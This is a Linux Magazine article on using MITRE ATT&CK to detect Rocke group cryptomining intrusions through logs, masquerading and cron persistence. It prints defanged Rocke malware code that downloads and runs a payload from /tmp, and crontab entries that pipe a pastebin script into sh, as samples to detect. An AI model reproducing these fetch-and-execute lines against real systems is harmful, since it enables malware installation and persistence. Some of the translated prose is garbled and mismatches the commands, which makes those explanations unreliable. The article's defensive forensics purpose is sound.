Working with the MITRE ATT&CK knowledge base

Detective Work

© Photo by Volodymyr Hryshchenko on Unsplash

© Photo by Volodymyr Hryshchenko on Unsplash

Article from Issue 266/2023

The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.

Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.

About Logs

Linux systems store data in logfiles. You can specify four main categories of logs: applications, events, services, and systems. Most logs are stored as text. Entries typically include important information such as: time, type, and severity levels of the event, as well as the name of the process and the Process ID (PID). Of course, there are also exceptions, such as wtmp or lastlog which have a binary format. Generally, files with logos are available in the /var/log directory, but not always. It happens that some programs save their diary files in other places.

In the event that systemd operates on your Linux system, many users reach for the journalctl command, which displays the messages of the systemd recorder.

When diagnosing problems or errors, the first thing you need to do is to check the logs. Searching for something in logs can be boring and time consuming. That is why many users prefer to use simple twists in the Bash shell. Text processing commands like grep and awk are popular tools for searching out log information. These tools are especially useful for quick, one-liner queries. The use of scripts will save time and make it easier to extract valuable data from logs.

An example of a simple uniform script is:

grep -E -r -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" > our-data.txt

The grep command uses a regular expression (the -e switch allows you to search with regex) to search data in the catalogs recursively (switch -R) and then displays the matched data parts in a separate line. The sort command sorts data, and the uniq command deletes duplicates. Then the result of this operation is saved to the our-data.txt file.

Searching for Evidence

It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:

  • T1036.005 – Masquerading: Match Legitimate Name or Location
  • T1053.003 – Scheduled Task/Job: Cron
  • T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking

The following sections takes a closer look at these techniques and what to do about them, but before delving into the details, remember that it is always a good idea to look for suspicious files.

Malware often creates files in the following directories:

  • /usr/local
  • /usr/sbin
  • /tmp

It is worth looking at these locations and checking if there are suspicious files in them. You might find file names similar to the correct ones, and sometimes a file might be generated automatically and take a series of numbers. It is good to check the hash of these files. If the hash is different from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether the hash is what it is supposed to be. The following command will find every executable file and check its control sum (SHA256), and the results will be saved to the list.txt file:

find -type f -exec sha256sum '{}' \; > list.txt

T1036.005: Masquerading

Suppose the group downloads a payload using the curl or wet command. The configuration file and the malware binary file are saved in the /tmp directory called kthrotlds. The launch malware is using the nohup command, rejecting the output data and enabling the background binary file to be made. Performing this process is a form of masking. The system will constantly perform a process called kthrotlds, but the processes will not use binary files in the /tmp folder.

Listing 1 shows part of the malicious code.

Listing 1

Malicious Code

01   if [ ${ARCH}x = "x86_64x" ]; then
02        (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \
03         /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \
04         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
05    elif [ ${ARCH}x = "i686x" ]; then
06        (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
07         /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
08         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
09    else
10        (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
11         /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
12         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
13    fi
14        nohup /tmp/kthrotlds >/dev/null 2>&1 &

By default, Linux does not log information on open ports and connections. However, netstat comes to the rescue:

netstat -tupln

This command will return information on connections (port and IP address) to and from the system. You can trace the connections that are set and then track down the most undesirable ones.

Another way to check for a masked process is with the ps command:

ps auxf

This command will display a list of processes running in the system. A malicious process often appears in square brackets, meaning that there are no arguments at the command line and it is possibly running as a thread.

T1053.003 – Cron

Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab entries that could execute malicious code.

Listing 2

Crontab Entries

01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
02   ##"
04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
05   ##"

In this case, the attacker does two things:

  • Adds a new crontab entry that points to a malicious script.
  • Places the malicious script in a folder, which will allow it to execute at a specific time defined in the crontab entry.

That is why it is always worth checking cron tasks to look for suspicious entries:

crontab -l

Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:

  • /var/spool/cron/root
  • /var/spool/cron/crontabs/root
  • /etc/cron.d/root
  • /etc/cron.hourly/oanacroner
  • /etc/cron.daily/oanacroner
  • /etc/cron.monthly/oanacroner

Or perform a search to find other cron-related files and directories on your system.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

comments powered by Disqus
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters

Support Our Work

Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.

Learn More